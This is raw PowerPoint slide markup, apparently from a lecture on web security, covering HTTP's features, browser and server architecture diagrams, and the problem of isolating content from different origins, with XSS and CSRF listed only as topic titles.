              <a:t>No need to manage the TCP socket at a low-level, i.e., delineate messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standardized data encoding formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support for long-lived client state, i.e., sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Highly extensible, i.e., with custom headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IMHO, these features help explain the popularity of HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If your application can be implemented as an exchange of messages, then HTTP will work for you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3534357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Web Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2743200"/>
            <a:ext cx="9497484" cy="2672522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Same Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1675407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11785600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Architecture circa-1992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5028" y="2282189"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400049" y="1514143"/>
            <a:ext cx="5527191"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869" y="2282189"/>
            <a:ext cx="971550" cy="971550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8538210" y="1514935"/>
            <a:ext cx="3356610"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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6037338" y="1514143"/>
            <a:ext cx="2390775" cy="461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t>Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6592165" y="3844760"/>
            <a:ext cx="1281120" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Gopher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291464" y="3514396"/>
            <a:ext cx="1411605" cy="2011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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Renderer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2564245" y="3514396"/>
            <a:ext cx="1805940" cy="52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HTML Parser</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5028" y="3998262"/>
            <a:ext cx="1043939" cy="1043939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4849637" y="4329174"/>
            <a:ext cx="2264913" cy="38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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7405753" y="4329174"/>
            <a:ext cx="2264913" cy="38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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4370185" y="3774593"/>
            <a:ext cx="1420850"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55275" y="3387776"/>
            <a:ext cx="744114" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1703069" y="3774592"/>
            <a:ext cx="861176" cy="745643"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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729268" y="4537258"/>
            <a:ext cx="1120841" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="5715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388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Elbow Connector 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="50" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1498923" y="4583541"/>
            <a:ext cx="1258155" cy="1549783"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37639"/>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1" idx="1"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2564245" y="3774593"/>
            <a:ext cx="902970" cy="1357702"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26005"/>
              <a:gd name="adj2" fmla="val 83864"/>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0" y="228600"/>
            <a:ext cx="11785600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Architecture circa-2016+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5028" y="2282189"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400049" y="1514143"/>
            <a:ext cx="5527191"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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8538210" y="1514935"/>
            <a:ext cx="3356610"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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6037338" y="1514143"/>
            <a:ext cx="2390775" cy="461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t>Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6037338" y="3185204"/>
            <a:ext cx="2390775" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP 1.0/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Websocket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>QUIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291464" y="3514396"/>
            <a:ext cx="1411605" cy="2011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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Model and Renderer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2564245" y="3514396"/>
            <a:ext cx="1805940" cy="52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HTML Parser</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6598" y="5140867"/>
            <a:ext cx="1043939" cy="1043939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4849637" y="4329174"/>
            <a:ext cx="2264913" cy="38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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7405753" y="4329174"/>
            <a:ext cx="2264913" cy="38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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4370185" y="3774593"/>
            <a:ext cx="1420850"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55275" y="3387776"/>
            <a:ext cx="744114" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1723965" y="3774593"/>
            <a:ext cx="840280" cy="548752"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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564245" y="5132295"/>
            <a:ext cx="1805940" cy="52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CSS Parser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2757077" y="4323345"/>
            <a:ext cx="1420850" cy="52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JS Runtime</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4177927" y="4570688"/>
            <a:ext cx="1613108" cy="8937"/>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929859" y="4201356"/>
            <a:ext cx="370614" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4370185" y="5420470"/>
            <a:ext cx="1420850"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852915" y="5042201"/>
            <a:ext cx="524504" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678706" y="4034790"/>
            <a:ext cx="287" cy="288555"/>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0" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1703069" y="4889242"/>
            <a:ext cx="861177" cy="503251"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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1" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1704396" y="4583542"/>
            <a:ext cx="1052681" cy="89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0" name="Flowchart: Magnetic Disk 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495609" y="5691676"/>
            <a:ext cx="1003313" cy="88329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Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Elbow Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3384433" y="3767179"/>
            <a:ext cx="712150" cy="4483171"/>
          </a:xfrm>
          <a:prstGeom prst="bent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238370" y="5988417"/>
            <a:ext cx="926857" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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1030" y="2122475"/>
            <a:ext cx="1005227" cy="1005227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rectangle 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9194338" y="3405920"/>
            <a:ext cx="1561147" cy="1787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Application Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Java, PHP, Python, Node, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Flowchart: Magnetic Disk 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10903267" y="2914914"/>
            <a:ext cx="1149708" cy="94572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Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68" name="Straight Arrow Connector 67"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="66" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729268" y="4299451"/>
            <a:ext cx="465070"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p:cNvCxnSpPr>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729268" y="5420470"/>
            <a:ext cx="2267330" cy="242367"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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66" idx="3"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10755485" y="4299451"/>
            <a:ext cx="763083" cy="841416"/>
          </a:xfrm>
          <a:prstGeom prst="bent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Elbow Connector 77"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="66" idx="3"/>
            <a:endCxn id="67" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10755485" y="3860638"/>
            <a:ext cx="722636" cy="438813"/>
          </a:xfrm>
          <a:prstGeom prst="bent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flipV="1">
            <a:off x="3271892" y="4029971"/>
            <a:ext cx="5556" cy="28764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3771549" y="4843739"/>
            <a:ext cx="287" cy="28855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33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the Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers have become incredibly complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ability to open multiple pages at the same time (tabs and windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute arbitrary code (JavaScript)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store state from many origins (cookies, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does the browser isolate code/data from different pages?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One page shouldn’t be able to interfere with any others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One page shouldn’t be able to read private data stored by any others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional challenge: content may mix origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web pages may embed images and scripts from other domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56275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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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Hourglass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="1256270"/>
            <a:ext cx="711200" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Left Brace 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4198661" y="2022934"/>
            <a:ext cx="1345512" cy="4351361"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 75913"/>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rot="10800000">
            <a:off x="1349377" y="2022934"/>
            <a:ext cx="1345512" cy="4351361"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 75913"/>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1285460" y="6374295"/>
            <a:ext cx="4320209" cy="34119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85460" y="1681740"/>
            <a:ext cx="4320209" cy="34119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cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1986520" y="2757638"/>
            <a:ext cx="292615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2115376" y="3701609"/>
            <a:ext cx="265098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2101728" y="4727465"/>
            <a:ext cx="266463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2000168" y="5625942"/>
            <a:ext cx="287663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57249" y="3967782"/>
            <a:ext cx="1388522" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IPv4, IPv6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
